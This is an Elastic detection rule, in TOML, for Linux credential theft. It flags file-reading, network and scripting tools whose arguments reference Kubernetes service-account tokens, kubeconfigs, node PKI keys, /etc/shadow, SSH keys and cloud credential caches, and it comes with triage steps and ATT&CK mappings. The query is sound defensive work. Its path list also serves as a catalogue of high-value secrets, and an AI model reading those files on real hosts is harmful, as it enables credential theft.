Kubernetes and Cloud Credential Path Access via Process Arguments

  1[metadata]
  2creation_date = "2026/04/29"
  3integration = ["endpoint", "auditd_manager"]
  4maturity = "production"
  5updated_date = "2026/04/29"
  6
  7[rule]
  8author = ["Elastic"]
  9description = """
 10Flags Linux process executions whose arguments reference high-value Kubernetes service-account material, kubeconfig or
 11node PKI paths, or common cloud and SSH credential files, when invoked via typical file-reading utilities or from
 12ephemeral directories. Useful for spotting in-cluster and hybrid credential theft early.
 13"""
 14false_positives = [
 15    """
 16    Legitimate backup, compliance scanners, or admin scripts that enumerate paths under /home or /var/run/secrets may
 17    match. Tune by parent process, image, or automation identity.
 18    """,
 19]
 20from = "now-9m"
 21index = ["auditbeat-*", "logs-auditd_manager.auditd-*", "logs-endpoint.events.process*"]
 22language = "kuery"
 23license = "Elastic License v2"
 24name = "Kubernetes and Cloud Credential Path Access via Process Arguments"
 25note = """## Triage and analysis
 26
 27### Investigating Kubernetes and Cloud Credential Path Access via Process Arguments
 28
 29Confirm whether the process user and parent chain are expected to read the matched path (for example a CI job,
 30bootstrap script, or kubelet). Reconstruct the full command line and check for piping, encoding, or exfiltration
 31patterns immediately after the read.
 32
 33### Possible investigation steps
 34
 35- Map the workload or login session to an identity; prioritize events from nodes, jump hosts, or pods with mounted
 36  service account tokens.
 37- Correlate with file, network, and Kubernetes audit telemetry for secret reads, token minting, or API calls using
 38  harvested material.
 39
 40### Response and remediation
 41
 42- Rotate affected service account tokens, kubeconfigs, and cloud keys when access was unauthorized; review RBAC and
 43  secret mount policy for the workload.
 44"""
 45references = [
 46    "https://attack.mitre.org/techniques/T1552/",
 47    "https://kubernetes.io/docs/concepts/security/service-accounts/",
 48]
 49risk_score = 73
 50rule_id = "5f0fff18-f340-444b-9a98-c49ade766ff4"
 51setup = """## Setup
 52
 53Requires **Elastic Defend** and/or **Auditd Manager** process telemetry (`logs-endpoint.events.process*`,
 54`logs-auditd_manager.auditd-*`, `auditbeat-*`) with command-line argument capture for exec events.
 55
 56### Elastic Defend
 57Install the Elastic Defend integration via Fleet on Linux hosts and use a policy that collects process events with
 58arguments.
 59
 60### Auditd Manager
 61Deploy Auditd Manager and ensure execve (or equivalent process) auditing is enabled so `process.args` and
 62`process.executable` populate for monitored binaries.
 63
 64See https://docs.elastic.co/integrations/auditd_manager
 65"""
 66severity = "high"
 67tags = [
 68    "Data Source: Auditd Manager",
 69    "Data Source: Elastic Defend",
 70    "Domain: Endpoint",
 71    "Domain: Kubernetes",
 72    "OS: Linux",
 73    "Use Case: Threat Detection",
 74    "Tactic: Credential Access",
 75    "Resources: Investigation Guide",
 76]
 77timestamp_override = "event.ingested"
 78type = "query"
 79query = '''
 80host.os.type:linux and event.category:process and event.action:(exec or executed) and 
 81(
 82  process.name:(
 83    busybox or cat or head or tail or more or less or sed or awk or 
 84    find or grep or ls or whereis or cp or mv or ln or
 85    curl or wget or scp or rsync or tar or zip or gzip or
 86    base64 or xxd or od or dd or tee or strings or xargs or jq or yq or
 87    openssl or ssh or sftp or nc or ncat or netcat or socat or
 88    python* or perl* or ruby* or node or php* or lua* or .*
 89  ) or
 90  process.args:(
 91    cat or head or tail or more or less or sed or awk or 
 92    find or grep or cp or mv or curl or wget or base64 or 
 93    tar or scp or dd or strings or xargs
 94  ) or
 95  process.executable:(/tmp/* or /var/tmp/* or /dev/shm/* or /home/* or /run/user/*)
 96) and process.args:(
 97  "/var/run/secrets/kubernetes.io/serviceaccount/token" or
 98  "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt" or
 99  "/var/run/secrets/eks.amazonaws.com/serviceaccount/token" or
100  "/var/run/secrets/azure/tokens/azure-identity-token" or
101  "/var/run/secrets/tokens/azure-identity-token" or
102  "/var/lib/kubelet/kubeconfig" or
103  "/etc/kubernetes/admin.conf" or
104  "/etc/kubernetes/pki/ca.key" or
105  "/etc/kubernetes/pki/apiserver-kubelet-client.key" or
106  "/var/lib/kubelet/pki/kubelet-client-current.pem" or
107  "/etc/rancher/k3s/k3s.yaml" or
108  "/etc/shadow" or
109  */.ssh/id_rsa or
110  */root/.ssh/id_ed25519 or
111  */.ssh/id_ecdsa or
112  */.aws/credentials or
113  */.aws/cli/cache/*.json or
114  */.aws/sso/cache/*.json or
115  */.azure/accessTokens.json or
116  */.azure/azureProfile.json or
117  */.azure/msal_token_cache.json or
118  */.config/gcloud/application_default_credentials.json or
119  */.config/gcloud/credentials.db or
120  */.config/gcloud/access_tokens.db or
121  */.config/gcloud/legacy_credentials or
122  */.kube/config or
123  */.docker/config.json
124)
125'''
126
127[[rule.threat]]
128framework = "MITRE ATT&CK"
129
130[[rule.threat.technique]]
131id = "T1552"
132name = "Unsecured Credentials"
133reference = "https://attack.mitre.org/techniques/T1552/"
134
135[[rule.threat.technique.subtechnique]]
136id = "T1552.001"
137name = "Credentials In Files"
138reference = "https://attack.mitre.org/techniques/T1552/001/"
139
140
141[[rule.threat.technique]]
142id = "T1528"
143name = "Steal Application Access Token"
144reference = "https://attack.mitre.org/techniques/T1528/"
145
146[rule.threat.tactic]
147id = "TA0006"
148name = "Credential Access"
149reference = "https://attack.mitre.org/tactics/TA0006/"